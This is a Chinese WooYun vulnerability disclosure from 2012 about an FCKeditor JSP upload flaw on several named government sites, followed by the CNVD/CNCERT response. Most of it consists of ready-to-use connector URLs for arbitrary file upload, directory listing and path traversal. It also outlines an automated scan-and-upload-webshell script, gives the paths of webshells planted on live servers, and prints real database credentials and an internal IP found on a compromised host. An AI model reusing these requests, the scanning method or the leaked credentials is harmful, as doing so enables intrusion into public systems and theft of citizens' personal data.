漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-09607
漏洞标题:北京社会保障局等政府网站多处安全严重安全漏洞
相关厂商:北京人力资源和社会保障局
漏洞作者: possible
提交时间:2012-07-13 17:08
修复时间:2012-08-27 17:08
公开时间:2012-08-27 17:08
漏洞类型:文件上传导致任意代码执行
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-07-13: 细节已通知厂商并且等待厂商处理中
2012-07-17: 厂商已经确认,细节仅向厂商公开
2012-07-27: 细节向核心白帽子及相关领域专家公开
2012-08-06: 细节向普通白帽子公开
2012-08-16: 细节向实习白帽子公开
2012-08-27: 细节向公众公开
简要描述:
多个政府站点使用的jsp版fck存在漏洞
详细说明:
jsp版FCK席卷一些小政府站点
一直做梦可以有这样一个工具,自动搜索漏洞,然后实现利用,然后提交乌云,然后自动刷rank。可惜呀,一直没有...
但是对于重复的问题,重复的漏洞,还是可以用工具来实现的...那样多省事,正所谓工具不是万能,但至少工具很省力
多个站点使用的fck编辑器存在漏洞
fck本身不用多说了,直接参考
WooYun: 中国联通某省站点任意文件上传
http://zone.wooyun.org/content/395
简单来说:使用有漏洞的jsp fck,攻击者可以不需要验证,直接上传任意文件,到任意目录(windows 是在站点本身分区)
这个漏洞扫描和利用都很简单,直接写个小脚本跑一跑就可以跑出很多....
大致过程:
1)获得jsp站点的域名列表(可以是从百度根据关键字抓取的,或者自己整理的)
2)对每个域名发送请求/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=file&CurrentFolder=/
3)正则匹配返回结果的<CurrentFolder path="/" url=",判断是否存在fck编辑器
4)如果存在fck直接使用post,上传一个shell
5)判断shell上传是否成功,输出shell路径...
通过这个小的脚本发现很多站点使用这个fck,因此,整理一下政府站点,拿感觉稍微有价值的,刷刷rank:
站点1:北京人力资源和社会保障局
fck: http://www.bjld.gov.cn/LDJAPP//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
shell:http://www.bjld.gov.cn/LDJAPP/UserFiles/Image/shell.jsp
简单分析:
没有仔细看代码,简单看一下,上面数据很多,站点很多
D:\bea815\user_projects\domains\mydomain\config.xml
而且数据库连接权限很大,很多sa
("jdbc:odbc:ldj","sa","cns");
jdbc1.url=jdbc:jtds:sqlserver://192.168.1.37:1433/middledata
jdbc1.username=sa
jdbc1.password=ldj
也许政府都是sa...
简单看一下 这个页面http://www.bjld.gov.cn/LDJAPP/tools/crm.jsp
很是无语,10几w的数据就这样显示出来?干啥用的?
目测这个内网有很多站点,如http://www.bjld.gov.cn/cardbiz 社会保障卡,不敢想想所有帝都人信息可能都在里面,
无论你在哪个公司,因为你都会发社会保障卡...
不敢进去看了,就到这了...
还有一个任意文件下载:
http://www.bjld.gov.cn/LDJAPP/zcfg/downloadfile.jsp?dest=../../WEB-INF/web.xml&src=web.xml
站点2:福建省人口计生委公众网
本来不想说这个了,因为已经在http://zone.wooyun.org/content/395写了当时的测试过程,但是这个还是
很有代表性,而且站点漏洞不补怕担责任,还是提醒站点修复吧。毕竟上面还有防篡改设备,还是做的不错。利用FCK漏洞向任意目录上传,导致了防篡改设备失效。
FCK列目录功能:
http://www.fjjsw.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
查看当前目录下的所有文件和文件夹,并且FCK没有对CurrentFolder参数进行限制,导致../实现路径回退
两次回退到站点根目录:
http://www.fjjsw.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../../
继续向上回溯发现,站点放到tomcat的默认目录下。而且仅对当前站点进行了防篡改保护。导致向其他目录上传
shell即可绕过防篡改软件。
本地提交:
http://www.fjjsw.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/../../../lybbs/
获得shell.
http://www.fjjsw.gov.cn/lybbs/shellnew.jsp
站点3:杭州大学生就业网
存在任意文件下载
http://www.zjhz.lss.gov.cn/lemis/netweb/detail/download.jsp?url=/&filename=WEB-INF/web.xml
找到fck位置:
http://www.zjhz.lss.gov.cn/lemis/managenetweb/info/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
直接上传文件,但是发现上传后shell不能访问,程序对访问路径进行了判断,只要在允许的几个目录才可以访问,
从上面的下载漏洞可知,netweb/detail/目录下是可以访问没有限制的,因此直接利用FCK的跨目录上传即可,构造
上传请求:
http://www.zjhz.lss.gov.cn/lemis/managenetweb/info/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/../../netweb/detail/
即可跨目录上传,获得shell路径
http://www.zjhz.lss.gov.cn/lemis/netweb/detail/shellnew.jsp
杭州劳动保障等站点在该域名下...
不一一说了问题都是一样的:
成都财政局会计网
http://www.cdkjw.org/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
佛山的虚拟主机,上面小站点挺多
http://www.fsyigong.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
广州天河人民法院
http://www.gzthfy.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
中国少儿基金
http://baoxian.cctf.org.cn//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
就写这些吧,好像还有,不知道放到哪里了...
漏洞证明:
http://www.bjld.gov.cn/LDJAPP/UserFiles/Image/shell.jsp 留个shell
其它证明如上 不截图了太麻烦了...
修复方案:
下载无漏洞版本的fck
版权声明:转载请注明来源 possible@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2012-07-17 16:40
厂商回复:
CNVD确认部分情况,其中一些站点漏洞因实时访问情况无法复现,目前已经协调以下单位进行处置:北京市信息化主管部门、CNCERT广东分中心、CNCERT福建分中心、CNCERT四川分中心。
后续一些站点视情况再行处置,fckeditor的虽算不上通用软件漏洞,但因配置不当造成的问题却很严重。
rank 15
最新状态:
暂无